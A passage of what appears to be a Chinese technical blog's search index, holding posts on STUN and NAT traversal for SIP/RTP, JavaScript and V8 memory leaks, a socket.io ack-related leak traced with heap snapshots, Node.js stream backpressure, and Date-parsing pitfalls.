\u0026ldquo;STUN协议笔记\u0026rdquo; date: \u0026ldquo;2022-01-06 17:54:10\u0026rdquo; draft: false STUN是Simple Traversal of User Datagram Protocol (UDP) through Network Address Translators (NAT’s)的缩写 传输层底层用的是UDP 主要用来NAT穿透 主要用来解决voip领域的单方向通话(one-way)的问题 目的是让NAT后面的设备能发现自己的公网IP以及NAT的类型 让外部设备能够找到合适的端口和内部设备通信 刷新NAT绑定,类似keep-alive机制。否则端口映射可能因为超时被释放 STUN是cs架构的协议 客户端端192.168.1.3,使用5060端口,发送stun请求到 64.25.58.65, 经过了192.168.1.1的网关之后 网关将源ip改为212.128.56.125, 端口改为15050 stun服务器将请求发送到 网关的外网端口15050,然后网关将请求转发给192.168.1.3:5060 stun message type which typically is one of the below: - 0x0001 : Binding Request - 0x0101 : Binding Response\n0x0111 : Binding Error Response 0x0002 : Shared Secret Request 0x0102 : Shared Secret Response 0x0112 : Shared Secret Error Response **0x0001: MAPPED-ADDRESS - **This attribute contains an IP address and port.","title":"STUN协议笔记"},{"content":"什么是NAT? NAT(网络地址转换), 具体可以参考百科 https://baike.baidu.com/item/nat/320024。\nNAT是用来解决IPv4的地址不够的问题。\n例如上图,内网的主机,在访问外网时,源192.168的网址,会被改写成1.2.3.4。所以在server端看来,请求是从1.2.3.4发送过来的。\nNAT一般会改写请求的源IP包的源IP地址,也可能会改写tcp或者udp的源端口地址。\nNAT地址范围 互联网地址分配机构保留了三类网址只能由于私有地址,这些地址只能由于NAT内部,不能用于公网。\n如果在sip消息中,Contact头中的地址是192.168开头,聪明的服务器应该知道,这个请求来自NAT内部。\n10.0.0.0 - 10.255.255.255 (10/8 prefix) 172.16.0.0 - 172.31.255.255 (172.16/12 prefix) 192.168.0.0 - 192.168.255.255 (192.168/16 prefix) NAT 工作原理 NAT内部流量流出时,源IP和源端口都被改写,目标地址和端口不会改写。源ip和端口与被改写后的ip和端口存在一段时间的映射关系,当响应回来时,根据这个映射关系,NAT设备知道这个包应该发给内网的哪个设备。\nNAT分类 静态NAT: 每个内部主机都永久映射一个外部公网IP 动态NAT: 每个内部主机都动态映射一个外部公网IP 网络地址端口转换: 内部主机映射到外部不同端口上 由于静态NAT和动态NAT并不能节省公网IP, 常用的都是网络地址端口转换,即NAPT。\nNAPT 网络地址端口转换分类 全锥型NAT 限制锥型NAT: 限制主机 端口限制NAT:限制主机和端口 Full Cone NAT 全锥型NAT 打洞过程\n来自nat内部ip1:port1地址在经过路由器时,路由器会打洞ip1\u0026rsquo;:port1' 任何服务器只要把包发到ip1\u0026rsquo;:port1\u0026rsquo;,路由器都会把这个包发到ip1:port1。也就是说,即使刚开始打洞的包是发给server1的,如果server2知道这个洞的信息,那么server2也可以通过这洞,将消息发给ip1:port1 Restricted Cone NAT 限制锥型NAT 限制锥型打洞过程和全锥型差不多,只不过增加了限制。\n如果内部主机是把包发到server1的,即使server2知道打洞的信息,它发的包也不会被转给内部主机。 Port Restricted Cone NAT 端口限制NAT 端口限制NAT要比上述两种NAT的限制更为严格\n内部主机如果将消息发到server1的5080端口,那么这个端口只允许server1的5080端口发消息回来 server1的其他端口发消息到这个洞都会被拒绝 SIP信令NAT穿越 NAT内部消息发到fs时,会携带如下信息。假如fs对NAT一无所知,如果后续有呼叫,fs是无法将消息发到192.168.0.102的,因为192.168.0.102是内网地址。\n但是fs足够聪明,它会从分析包的源ip和源端口,从而正确的将sip消息送到NAT设备上。\nVia: SIP/2.0/UDP 192.168.1.160:11266;branch=z9hG4bK-d8754z-1f2cd509;rport Contact: \u0026lt;sip:flavio@192.168.1.160:11266\u0026gt; c=IN IP4 192.168.1.160 m=audio 8616 RTP/AVP 0 8 3 101 sip消息头Via, Contact以及sdp中的c=和m=, 可能会带有内网的ip和端口,如果不加以翻译处理,sip服务器是无法将消息发到这些内网地址上的。\nfs会将原始Contact头增加一些信息\nContact 1001@192.168.0.102:5060;fs_nat=yes;fs_path:sip:1001@1.2.3.4:23424 RTP流NAT穿越 c=IN IP4 192.168.40.79 m=audio 31114 RTP/AVP 0 8 9 101 一般invite消息或者200ok的sdp下都会携带连接信息, c=, 但是这个连接信息因为是内网地址,所以fs并不会使用这个作为rtp的对端地址。\nfs会等待NAT内部设备发来的第一个RTP包,fs会分析RTP包,提取出NAT设备上的RTP洞的信息,然后将另一方的语音流送到NAT设备上的洞里。\n再由NAT设备将RTP流送到对应的内部主机。\nNAT与SIP的问题 NAT设备,例如路由器,一般工作在网络层和传输层。NAT会修改网络层的IP地址和传输层的端口,但是NAT不会修改包的内容。sip消息都是封装到包内容中的。\n看一个INVITE消息,出现的内容都是内网中的,当sip服务器收到这个消息,那么它是无法向内网发送响应体的。\nVia 头中的10.1.1.221:5060 c=IN IP4 10.1.1.221 m=audio 49170 RTP/AVP 0 当然,有问题就有解决方案\nreceived 标记来源ip rport 标记来源端口 使用这两个字段,就可以将数据正确的发送到NAT设备上\nINVITE sip:UserB@there.com SIP/2.0 Via: SIP/2.0/UDP 10.1.1.221:5060;branch=z9hG4bKhjh From: TheBigGuy \u0026lt;sip:UserA@customer.com\u0026gt;;tag=343kdw2 To: TheLittleGuy \u0026lt;sip:UserB@there.com\u0026gt; Max-Forwards: 70 Call-ID: 123456349fijoewr CSeq: 1 INVITE Subject: Wow! It Works... Contact: \u0026lt;sip:UserA@10.1.1.221\u0026gt; Content-Type: application/sdp Content-Length: ... v=0 o=UserA 2890844526 2890844526 IN IP4 UserA.customer.coms=- t=0 0 c=IN IP4 10.1.1.221 m=audio 49170 RTP/AVP 0 a=rtpmap:0 PCMU/8000 参考 https://tools.ietf.org/html/rfc1918 ","permalink":"https://wdd.js.org/opensips/ch1/nat-sip-rtp/","summary":"什么是NAT? NAT(网络地址转换), 具体可以参考百科 https://baike.baidu.com/item/nat/320024。\nNAT是用来解决IPv4的地址不够的问题。\n例如上图,内网的主机,在访问外网时,源192.168的网址,会被改写成1.2.3.4。所以在server端看来,请求是从1.2.3.4发送过来的。\nNAT一般会改写请求的源IP包的源IP地址,也可能会改写tcp或者udp的源端口地址。\nNAT地址范围 互联网地址分配机构保留了三类网址只能由于私有地址,这些地址只能由于NAT内部,不能用于公网。\n如果在sip消息中,Contact头中的地址是192.168开头,聪明的服务器应该知道,这个请求来自NAT内部。\n10.0.0.0 - 10.255.255.255 (10/8 prefix) 172.16.0.0 - 172.31.255.255 (172.16/12 prefix) 192.168.0.0 - 192.168.255.255 (192.168/16 prefix) NAT 工作原理 NAT内部流量流出时,源IP和源端口都被改写,目标地址和端口不会改写。源ip和端口与被改写后的ip和端口存在一段时间的映射关系,当响应回来时,根据这个映射关系,NAT设备知道这个包应该发给内网的哪个设备。\nNAT分类 静态NAT: 每个内部主机都永久映射一个外部公网IP 动态NAT: 每个内部主机都动态映射一个外部公网IP 网络地址端口转换: 内部主机映射到外部不同端口上 由于静态NAT和动态NAT并不能节省公网IP, 常用的都是网络地址端口转换,即NAPT。\nNAPT 网络地址端口转换分类 全锥型NAT 限制锥型NAT: 限制主机 端口限制NAT:限制主机和端口 Full Cone NAT 全锥型NAT 打洞过程\n来自nat内部ip1:port1地址在经过路由器时,路由器会打洞ip1\u0026rsquo;:port1' 任何服务器只要把包发到ip1\u0026rsquo;:port1\u0026rsquo;,路由器都会把这个包发到ip1:port1。也就是说,即使刚开始打洞的包是发给server1的,如果server2知道这个洞的信息,那么server2也可以通过这洞,将消息发给ip1:port1 Restricted Cone NAT 限制锥型NAT 限制锥型打洞过程和全锥型差不多,只不过增加了限制。\n如果内部主机是把包发到server1的,即使server2知道打洞的信息,它发的包也不会被转给内部主机。 Port Restricted Cone NAT 端口限制NAT 端口限制NAT要比上述两种NAT的限制更为严格\n内部主机如果将消息发到server1的5080端口,那么这个端口只允许server1的5080端口发消息回来 server1的其他端口发消息到这个洞都会被拒绝 SIP信令NAT穿越 NAT内部消息发到fs时,会携带如下信息。假如fs对NAT一无所知,如果后续有呼叫,fs是无法将消息发到192.168.0.102的,因为192.168.0.102是内网地址。\n但是fs足够聪明,它会从分析包的源ip和源端口,从而正确的将sip消息送到NAT设备上。\nVia: SIP/2.0/UDP 192.168.1.160:11266;branch=z9hG4bK-d8754z-1f2cd509;rport Contact: \u0026lt;sip:flavio@192.","title":"SIP信令和媒体都绕不开的NAT问题"},{"content":"参考: http://slides.com/gruizdevilla/memory\n内存是一张图 原始类型,只能作为叶子。原始类型不能引用其他类型 数字 字符串 布尔值 除了原始类型之外,其他类型都是对象,其实就是键值对 数组是一种特殊对象,它的键是连续的数字 内存从根开始 在浏览器中,根对象是window 在nodejs中,根对象是global 任何从根无法到达的对象,都会被GC回收,例如下图的节点9和10 根节点的GC是无法控制的 路径 从根节点开始到特定对象的路径,如下图的1-2-4-6-8 支配项 每个对象有且仅有一个支配项,支配项对对象可能不是直接引用 举例子 节点1支配节点2 节点2支持节点3、4、6 节点3支配节点5 节点6支配节点7 节点5支配节点8 上面的例子有个不好理解的是节点2为什么支配了节点6?如果节点A存在于从根节点到节点B的每一个路径中,那么A就是B的支配项。2存在于1-2-4-6,也存在于1-2-3-6,所以节点2支配节点6 V8 新生代与老生代 v8内存分为新生代和老生代内存,两块内存使用不同的内存GC策略 相比而言,新生代GC很快,老生代则较慢 新生代的内存在某些条件下会被转到老生代内存区 GC发生时,用可能应用会暂停 解除引用的一些错误 var a = {name: \u0026#39;wdd\u0026#39;} delete a.name // 这回让对象a变成慢对象 var a = {name: \u0026#39;wdd\u0026#39;} a.name = null // 这个则更好 关于slow Object V8 optimizing compiler makes assumptions on your code to make optimizations. It transparently creates hidden classes that represent your objects. Using this hidden classes, V8 works much faster. If you \u0026ldquo;delete\u0026rdquo; properties, these assumptions are no longer valid, and the code is de-optimized, slowing your code. // Fast Object function FastPurchase(units, price) { this.units = units; this.price = price; this.total = 0; this.x = 1; } var fast = new FastPurchase(3, 25); // Slow Object function SlowPurchase(units, price) { this.units = units; this.price = price; this.total = 0; this.x = 1; } var slow = new SlowPurchase(3, 25); //x property is useless //so I delete it delete slow.x; Timers内存泄露 // var buggyObject = { callAgain: function () { var ref = this; var val = setTimeout(function () { console.log(\u0026#39;Called again: \u0026#39; + new Date().toTimeString()); ref.callAgain(); }, 1000); } }; buggyObject.callAgain(); buggyObject = null; 闭包内存泄露 var a = function () { var largeStr = new Array(1000000).join(\u0026#39;x\u0026#39;); return function () { return largeStr; }; }(); var a = function () { var smallStr = \u0026#39;x\u0026#39;, largeStr = new Array(1000000).join(\u0026#39;x\u0026#39;); return function (n) { return smallStr; }; }(); var a = function () { var smallStr = \u0026#39;x\u0026#39;, largeStr = new Array(1000000).join(\u0026#39;x\u0026#39;); return function (n) { eval(\u0026#39;\u0026#39;); //maintains reference to largeStr return smallStr; }; }(); DOM 内存泄露 #leaf maintains a reference to it\u0026rsquo;s parent (parentNode), and recursively up to #tree, so only when leafRef is nullified is the WHOLE tree under #tree candidate to be GC\nvar select = document.querySelector; var treeRef = select(\u0026#34;#tree\u0026#34;); var leafRef = select(\u0026#34;#leaf\u0026#34;); var body = select(\u0026#34;body\u0026#34;); body.removeChild(treeRef); //#tree can\u0026#39;t be GC yet due to treeRef treeRef = null; //#tree can\u0026#39;t be GC yet, due to //indirect reference from leafRef leafRef = null; //NOW can be #tree GC 守则 Use appropiate scope Better than de-referencing, use local scopes. Unbind event listeners Unbind events that are no longer needed, specially if the related DOM objects are going to be removed. Manage local cache Be careful with storing large chunks of data that you are not going to use. 分析内存泄漏的工具 浏览器: performance.memory devtool memory profile 关于闭包的提示 给闭包命名,这样在内存分析时,就可以按照函数名找到对应的函数 ","permalink":"https://wdd.js.org/fe/memory-leak-ppt/","summary":"参考: http://slides.com/gruizdevilla/memory\n内存是一张图 原始类型,只能作为叶子。原始类型不能引用其他类型 数字 字符串 布尔值 除了原始类型之外,其他类型都是对象,其实就是键值对 数组是一种特殊对象,它的键是连续的数字 内存从根开始 在浏览器中,根对象是window 在nodejs中,根对象是global 任何从根无法到达的对象,都会被GC回收,例如下图的节点9和10 根节点的GC是无法控制的 路径 从根节点开始到特定对象的路径,如下图的1-2-4-6-8 支配项 每个对象有且仅有一个支配项,支配项对对象可能不是直接引用 举例子 节点1支配节点2 节点2支持节点3、4、6 节点3支配节点5 节点6支配节点7 节点5支配节点8 上面的例子有个不好理解的是节点2为什么支配了节点6?如果节点A存在于从根节点到节点B的每一个路径中,那么A就是B的支配项。2存在于1-2-4-6,也存在于1-2-3-6,所以节点2支配节点6 V8 新生代与老生代 v8内存分为新生代和老生代内存,两块内存使用不同的内存GC策略 相比而言,新生代GC很快,老生代则较慢 新生代的内存在某些条件下会被转到老生代内存区 GC发生时,用可能应用会暂停 解除引用的一些错误 var a = {name: \u0026#39;wdd\u0026#39;} delete a.name // 这回让对象a变成慢对象 var a = {name: \u0026#39;wdd\u0026#39;} a.name = null // 这个则更好 关于slow Object V8 optimizing compiler makes assumptions on your code to make optimizations. It transparently creates hidden classes that represent your objects.","title":"JavaScript内存泄露分析"},{"content":"什么是内存泄漏? 单位时间内的内存变化量可能有三个值\n正数:内存可能存在泄漏。生产环境,如果服务在启动后,该值一直是正值,从未出现负值或者趋近于0的值,那么极大的可能是存在内存泄漏的。 趋近于0的值: 内存稳定维持 负数:内存在释放 实际上,在观察内存变化量时,需要有两个前提条件\n一定的负载压力:因为在开发或者功能测试环境,很少的用户,服务的压力很小,是很难观测到内存泄漏问题的。所以务必在一定的负载压力下观测。 至少要观测一天:内存上涨并不一定意味着存在内存泄漏问题。在一个工作日中,某些时间点,是用户使用的高峰期,服务的负载很高,自然内存使用会增长。关键在于在高峰期过后的低谷期时,内存是否回下降到正常值。如果内存在低谷期时依然维持着高峰期时的内存使用,那么非常大可能是存在内存泄漏了。 下图是两个服务的。从第一天的0点开始观测服务的内存,一直到第二天的12点。正常的服务会随着负载的压力增加或者减少内存使用。而存在内存泄漏的服务,内存一直在上升,并且负载压力越大,上升的越快。\n有没有可能避免内存泄漏? 除非你不写代码,否者你是无法避免内存泄漏的问题的。\n第一,即使你是非常精通某个语言,也是有很多关于如何避免内存泄漏的经验。但是你的代码里仍然可能会包含其他库或者其他同事写的代码,那些代码里是无法保证是否存在内存泄漏问题的。 第二,内存泄漏的代码有时候非常难以察觉。例如console.log打印的太快,占用太多的buffer。网络流量激增,占用太多的Recv_Q,node无法及时处理。写文件太慢,没有处理“后压”相关的逻辑等等。\n为什么要关注内存泄漏? 为什么要关注内存泄漏?我们客户的服务器可是有500G内存的\n你可能有个很豪的金主。但是你不要忘记一个故事。\n传说国际象棋是由一位印度数学家发明的。国王十分感谢这位数学家,于是就请他自己说出想要得到什么奖赏。这位数学家想了一分钟后就提出请求——把1粒米放在棋盘的第1格里,2粒米放在第2格,4粒米放在第3格,8粒米放在第4格,依次类推,每个方格中的米粒数量都是之前方格中的米粒数量的2倍。\n国王欣然应允,诧异于数学家竟然只想要这么一点的赏赐——但随后却大吃了一惊。当他开始叫人把米放在棋盘上时,最初几个方格中的米粒少得像几乎不存在一样。但是,往第16个方格上放米粒时,就需要拿出1公斤的大米。而到了第20格时,他的那些仆人则需要推来满满一手推车的米。国王根本无法提供足够的大米放在棋盘上的第64格上去。因为此时,棋盘上米粒的数量会达到惊人的18 446 744 073 709 551 615粒。如果我们在伦敦市中心再现这一游戏,那么第64格中的米堆将延伸至M25环城公路,其高度将超过所有建筑的高度。事实上,这一堆米粒比过去1000年来全球大米的生产总量还要多得多。\n对于内存泄漏来说,可能500G都是不够用的。\n实际上操作系统对进程使用内存资源是有限制的,我们关注内存泄漏,实际上是关注内存泄漏会引起的最终问题:out of memory。如果进程使用的资源数引起了操作系统的注意,很可能进程被操作系统杀死。\n然后你的客户可能正在使用你的服务完成一个重要的事情,接着你们的客户投诉热线回被打爆,然后是你的老板,你的领导找你谈话~~~\n基本类型 vs 引用类型 基本类型:undefined, null, boolean, number, string。基本类型是按值访问 引用类型的值实际上是指向内存中的对象 上面的说法来自《JavaScript高级程序设计》。但是对于基本类型字符串的定义,实际上我是有些不认同的。有些人也认为字符串不属于基本类型。\n就是关于字符串,我曾思考过,在JavaScript里,字符串的最大长度是多少,字符串最多能装下多少个字符?\n我个人认为,一个变量有固定的大小的内存占用,才是基本类型。例如数字,null, 布尔值,这些值很容易能理解他们会占用固定的内存大小。但是字符串就不一样了。字符串的长度是不固定,在不同的浏览器中,有些字符串最大可能占用256M的内存,甚至更多。\n可以参考这个问题:https://stackoverflow.com/questions/34957890/javascript-string-size-limit-256-mb-for-me-is-it-the-same-for-all-browsers\n内存是一张图 1代表根节点,在NodeJS里是global对象,在浏览器中是window对象 2-6代表对象 7-8代表原始类型。分别有三种,字符串,数字,布尔值 9-10代表从根节点无法到达的对象 注意,作为原始类型的值,在内存图中只能是叶子节点。 ** 从跟节点R0无法到达的节点9,10,将会在GC时被清除。\n保留路径的含义是从跟对象到某一节点的最短路径。例如1-\u0026gt;2-\u0026gt;4-\u0026gt;6。\n对象保留树 节点: 构造函数的名称 边缘:对象的key 距离: 节点到跟节点的最短距离 支配项(Dominators) 每个对象有且仅有一个支配项 如果B存在从根节点到A节点之间的所有路径中,那么B是A的支配项,即B支配A。 下图中\n1支配2 2支配3,4,6 (想想2为什么没有支配5?) 3支配5 6支配7 5支配8 理解支配项的意义在于理解如何将资源释放。如下图所示,如果目标是释放节点6的占用资源,仅仅释放节点3或者节点4是没有用的,必需释放其支配项节点2,才能将节点6释放。 对象大小 对象自身占用大小:shadow size 通过保持对其他对象的引用隐式占用,这种方式可以阻止这些对象被垃圾回收器(简称 GC)自动处置 对象的大小的单位是字节 分析工具 heapsnapshot import {writeHeapSnapshot} from \u0026#39;v8\u0026#39; router.get(\u0026#39;/heapdump\u0026#39;, function (req: express.Request, res: express. Response, next: express.NextFunction) { logger.debug(\u0026#39;help_heapdump::\u0026#39;, req.ip, req.hostname) if (req.hostname !== \u0026#39;localhost\u0026#39;) { logger.error(\u0026#39;error:report_bad_host:\u0026#39;, req.hostname) return res.status(401).end() } res.status(200).end() let fileName = writeHeapSnapshot(\u0026#39;node.heapsnapshot\u0026#39;) logger.info(\u0026#39;help_heapdumap_file::\u0026#39;, fileName) }) 通过将v8 writeHeapSnapshot放到express的路由中,我们可以简单通过curl的方式产生snapshot文件。需要注意的是,writeHeapSnapshot可能需要一段时间来产生snapshot文件。在生产环境要注意,需要注意产生该函数的调用频率。\n拿到snapshot文件后,下一步是使用chrome dev-tools去打开这个文件。\n在chrome的inspect页面:chrome://inspect/#devices\n点击Open dedicated DevTools for Node。可以打开一个单独的页面dev-tools页面。当然你也可以任意一个页面打开devTools.\n点击load, 选择snapshot文件,就可以加载了。 真实的内存泄漏实战分析: socket.io内存泄漏 我写过一个使用socket.io来完成实时消息推送的服务,在做压力测试的时候,两个实例,模拟2000个客户端WebSocket连接,然后以每秒1000个速度发送消息,在持续压测15个小时之后,Node.js的内存从50M上涨到1.5G。所以,这其中必然产生了内存泄漏。\n在array这一列,可以看出它占用的Shallow Size和Retained Size占用的内存都是超过90%的。 我们展开array这一列,可以发现有很多的distance是15的对象。然后我们展开其中一个对象后。\n可以发现从距离是14到1之间的保留路径。\n展开一个对象之后,发现有很多ackClient,这个ackClient实际上对应了代码里我写的一个函数,用来确认消息是否被客户端收到的。这个确认机制是socket.io提供的。\n当我确认内存泄漏是socket.io的确认机制的问题后,我就将确认的函数从代码中移除,改为消息不确认。在一段时间的压测过后,服务的内存趋于稳定,看来问题已经定位了。\nsocket.io内存泄漏的原因 在阅读了socket.io的源码之后,可以看到每个Socket对象都有一个acks对象用来表示确认。\nfunction Socket(nsp, client, query){ this.nsp = nsp; this.server = nsp.server; this.adapter = this.nsp.adapter; this.id = nsp.name !== \u0026#39;/\u0026#39; ? nsp.name + \u0026#39;#\u0026#39; + client.id : client.id; this.client = client; this.conn = client.conn; this.rooms = {}; this.acks = {}; this.connected = true; this.disconnected = false; this.handshake = this.buildHandshake(query); this.fns = []; this.flags = {}; this._rooms = []; } 在调用socket.emit()方法时,socket.io会将消息的id附着在acks对象上,可以想象,随着消息发送的量增大,这个acks的属性将会越来越多。\nif (typeof args[args.length - 1] === \u0026#39;function\u0026#39;) { if (this._rooms.length || this.flags.broadcast) { throw new Error(\u0026#39;Callbacks are not supported when broadcasting\u0026#39;); } debug(\u0026#39;emitting packet with ack id %d\u0026#39;, this.nsp.ids); this.acks[this.nsp.ids] = args.pop(); packet.id = this.nsp.ids++; } 当收到ack之后,acks上对应的包的属性才会被删掉。\nSocket.prototype.onack = function(packet){ var ack = this.acks[packet.id]; if (\u0026#39;function\u0026#39; == typeof ack) { debug(\u0026#39;calling ack %s with %j\u0026#39;, packet.id, packet.data); ack.apply(this, packet.data); delete this.acks[packet.id]; } else { debug(\u0026#39;bad ack %s\u0026#39;, packet.id); } }; 如果客户端不对消息进行ack确认,那么服务端就会积累非常多的待确认的消息,最终导致内存泄漏。\n虽然这个问题的最终原因是客户端没有及时确认,但是查看一下socket.io的项目,发现已经有将近500个issue没有解决。我觉得有时间的话,我会用原生的websocket替换掉socket.io。不然这个socket.io很可能回成为项目的一个瓶颈点。\n参考资料 http://slides.com/gruizdevilla/memory http://bmeck.github.io/snapshot-utils/doc/manual/terms.html https://nodejs.org/dist/latest-v12.x/docs/api/v8.html#v8_v8_writeheapsnapshot_filename https://github.com/socketio/socket.io/issues/3494 ","permalink":"https://wdd.js.org/fe/memory-leak-sharing/","summary":"什么是内存泄漏? 单位时间内的内存变化量可能有三个值\n正数:内存可能存在泄漏。生产环境,如果服务在启动后,该值一直是正值,从未出现负值或者趋近于0的值,那么极大的可能是存在内存泄漏的。 趋近于0的值: 内存稳定维持 负数:内存在释放 实际上,在观察内存变化量时,需要有两个前提条件\n一定的负载压力:因为在开发或者功能测试环境,很少的用户,服务的压力很小,是很难观测到内存泄漏问题的。所以务必在一定的负载压力下观测。 至少要观测一天:内存上涨并不一定意味着存在内存泄漏问题。在一个工作日中,某些时间点,是用户使用的高峰期,服务的负载很高,自然内存使用会增长。关键在于在高峰期过后的低谷期时,内存是否回下降到正常值。如果内存在低谷期时依然维持着高峰期时的内存使用,那么非常大可能是存在内存泄漏了。 下图是两个服务的。从第一天的0点开始观测服务的内存,一直到第二天的12点。正常的服务会随着负载的压力增加或者减少内存使用。而存在内存泄漏的服务,内存一直在上升,并且负载压力越大,上升的越快。\n有没有可能避免内存泄漏? 除非你不写代码,否者你是无法避免内存泄漏的问题的。\n第一,即使你是非常精通某个语言,也是有很多关于如何避免内存泄漏的经验。但是你的代码里仍然可能会包含其他库或者其他同事写的代码,那些代码里是无法保证是否存在内存泄漏问题的。 第二,内存泄漏的代码有时候非常难以察觉。例如console.log打印的太快,占用太多的buffer。网络流量激增,占用太多的Recv_Q,node无法及时处理。写文件太慢,没有处理“后压”相关的逻辑等等。\n为什么要关注内存泄漏? 为什么要关注内存泄漏?我们客户的服务器可是有500G内存的\n你可能有个很豪的金主。但是你不要忘记一个故事。\n传说国际象棋是由一位印度数学家发明的。国王十分感谢这位数学家,于是就请他自己说出想要得到什么奖赏。这位数学家想了一分钟后就提出请求——把1粒米放在棋盘的第1格里,2粒米放在第2格,4粒米放在第3格,8粒米放在第4格,依次类推,每个方格中的米粒数量都是之前方格中的米粒数量的2倍。\n国王欣然应允,诧异于数学家竟然只想要这么一点的赏赐——但随后却大吃了一惊。当他开始叫人把米放在棋盘上时,最初几个方格中的米粒少得像几乎不存在一样。但是,往第16个方格上放米粒时,就需要拿出1公斤的大米。而到了第20格时,他的那些仆人则需要推来满满一手推车的米。国王根本无法提供足够的大米放在棋盘上的第64格上去。因为此时,棋盘上米粒的数量会达到惊人的18 446 744 073 709 551 615粒。如果我们在伦敦市中心再现这一游戏,那么第64格中的米堆将延伸至M25环城公路,其高度将超过所有建筑的高度。事实上,这一堆米粒比过去1000年来全球大米的生产总量还要多得多。\n对于内存泄漏来说,可能500G都是不够用的。\n实际上操作系统对进程使用内存资源是有限制的,我们关注内存泄漏,实际上是关注内存泄漏会引起的最终问题:out of memory。如果进程使用的资源数引起了操作系统的注意,很可能进程被操作系统杀死。\n然后你的客户可能正在使用你的服务完成一个重要的事情,接着你们的客户投诉热线回被打爆,然后是你的老板,你的领导找你谈话~~~\n基本类型 vs 引用类型 基本类型:undefined, null, boolean, number, string。基本类型是按值访问 引用类型的值实际上是指向内存中的对象 上面的说法来自《JavaScript高级程序设计》。但是对于基本类型字符串的定义,实际上我是有些不认同的。有些人也认为字符串不属于基本类型。\n就是关于字符串,我曾思考过,在JavaScript里,字符串的最大长度是多少,字符串最多能装下多少个字符?\n我个人认为,一个变量有固定的大小的内存占用,才是基本类型。例如数字,null, 布尔值,这些值很容易能理解他们会占用固定的内存大小。但是字符串就不一样了。字符串的长度是不固定,在不同的浏览器中,有些字符串最大可能占用256M的内存,甚至更多。\n可以参考这个问题:https://stackoverflow.com/questions/34957890/javascript-string-size-limit-256-mb-for-me-is-it-the-same-for-all-browsers\n内存是一张图 1代表根节点,在NodeJS里是global对象,在浏览器中是window对象 2-6代表对象 7-8代表原始类型。分别有三种,字符串,数字,布尔值 9-10代表从根节点无法到达的对象 注意,作为原始类型的值,在内存图中只能是叶子节点。 ** 从跟节点R0无法到达的节点9,10,将会在GC时被清除。\n保留路径的含义是从跟对象到某一节点的最短路径。例如1-\u0026gt;2-\u0026gt;4-\u0026gt;6。\n对象保留树 节点: 构造函数的名称 边缘:对象的key 距离: 节点到跟节点的最短距离 支配项(Dominators) 每个对象有且仅有一个支配项 如果B存在从根节点到A节点之间的所有路径中,那么B是A的支配项,即B支配A。 下图中\n1支配2 2支配3,4,6 (想想2为什么没有支配5?) 3支配5 6支配7 5支配8 理解支配项的意义在于理解如何将资源释放。如下图所示,如果目标是释放节点6的占用资源,仅仅释放节点3或者节点4是没有用的,必需释放其支配项节点2,才能将节点6释放。 对象大小 对象自身占用大小:shadow size 通过保持对其他对象的引用隐式占用,这种方式可以阻止这些对象被垃圾回收器(简称 GC)自动处置 对象的大小的单位是字节 分析工具 heapsnapshot import {writeHeapSnapshot} from \u0026#39;v8\u0026#39; router.","title":"JS内存泄漏分享"},{"content":"今天我收集了一份大概有40万行的日志,为了充分利用这份日志,我决定把日志给解析,解析完了之后,再写入mysql数据库。\n首先,对于40万行的日志,肯定不能一次性读取到内存。\n所以我用了NodeJs内置的readline模块。\nconst readline = require(\u0026#39;readline\u0026#39;) let line_no = 0 let rl = readline.createInterface({ input: fs.createReadStream(\u0026#39;./my.log\u0026#39;) }) rl.on(\u0026#39;line\u0026#39;, function(line) { line_no++; console.log(line) }) // end rl.on(\u0026#39;close\u0026#39;, function(line) { console.log(\u0026#39;Total lines : \u0026#39; + line_no); }) 数据解析以及写入到这块我没有贴代码。代码的执行是正常的,但是一段时间之后,程序就报错Out Of Memory。\n代码执行是在nodejs 10.16.3上运行的,谷歌搜了一下解决方案,看到有人说nodejs升级到12.x版本就可以解决这个问题。我抱着试试看的想法,升级了nodejs到最新版,果然没有再出现OOM的问题。\n后来我想,我终于深刻理解了NodeJS官网上的这篇文章 Backpressuring in Streams,以前我也度过几遍,但是不太了解,这次接合实际情况。有了深刻理解。\nNodeJS在按行读取本地文件时,大概可以达到每秒1000行的速度,然而数据写入到MySql,大概每秒100次插入的样子。\n本身网络上存在的延迟就要比读取本地磁盘要慢,读到太多的数据无法处理,只能暂时积压到内存中,然而内存有限,最终OOM的异常就抛出了。\nNodeJS 12.x应该解决了这个问题。\n参考 https://nodejs.org/en/docs/guides/backpressuring-in-streams/ ","permalink":"https://wdd.js.org/fe/oom-backpressuring-in-streams/","summary":"今天我收集了一份大概有40万行的日志,为了充分利用这份日志,我决定把日志给解析,解析完了之后,再写入mysql数据库。\n首先,对于40万行的日志,肯定不能一次性读取到内存。\n所以我用了NodeJs内置的readline模块。\nconst readline = require(\u0026#39;readline\u0026#39;) let line_no = 0 let rl = readline.createInterface({ input: fs.createReadStream(\u0026#39;./my.log\u0026#39;) }) rl.on(\u0026#39;line\u0026#39;, function(line) { line_no++; console.log(line) }) // end rl.on(\u0026#39;close\u0026#39;, function(line) { console.log(\u0026#39;Total lines : \u0026#39; + line_no); }) 数据解析以及写入到这块我没有贴代码。代码的执行是正常的,但是一段时间之后,程序就报错Out Of Memory。\n代码执行是在nodejs 10.16.3上运行的,谷歌搜了一下解决方案,看到有人说nodejs升级到12.x版本就可以解决这个问题。我抱着试试看的想法,升级了nodejs到最新版,果然没有再出现OOM的问题。\n后来我想,我终于深刻理解了NodeJS官网上的这篇文章 Backpressuring in Streams,以前我也度过几遍,但是不太了解,这次接合实际情况。有了深刻理解。\nNodeJS在按行读取本地文件时,大概可以达到每秒1000行的速度,然而数据写入到MySql,大概每秒100次插入的样子。\n本身网络上存在的延迟就要比读取本地磁盘要慢,读到太多的数据无法处理,只能暂时积压到内存中,然而内存有限,最终OOM的异常就抛出了。\nNodeJS 12.x应该解决了这个问题。\n参考 https://nodejs.org/en/docs/guides/backpressuring-in-streams/ ","title":"NodeJS Out of Memory: Backpressuring in Streams"},{"content":"一般情况下,建议你不要用new Date(\u0026ldquo;time string\u0026rdquo;)的方式去做时间解析。因为不同浏览器,可能接受的time string的格式都不一样。\n你最好不要去先入为主,认为浏览器会支持的你的格式。\n常见的格式 2010-10-10 19:00:00 就这种格式,在IE11上是不接受的。\n下面的比较,在IE11上返回false, 在chrome上返回true。原因就在于,IE11不支持这种格式。\nnew Date() \u0026gt; new Date(\u0026#39;2010-10-10 19:00:00\u0026#39;) 所以在时间处理上,最好选用比价靠谱的第三方库,例如dayjs, moment等等。\n千万不要先入为主!!\n","permalink":"https://wdd.js.org/fe/trap-of-new-date/","summary":"一般情况下,建议你不要用new Date(\u0026ldquo;time string\u0026rdquo;)的方式去做时间解析。因为不同浏览器,可能接受的time 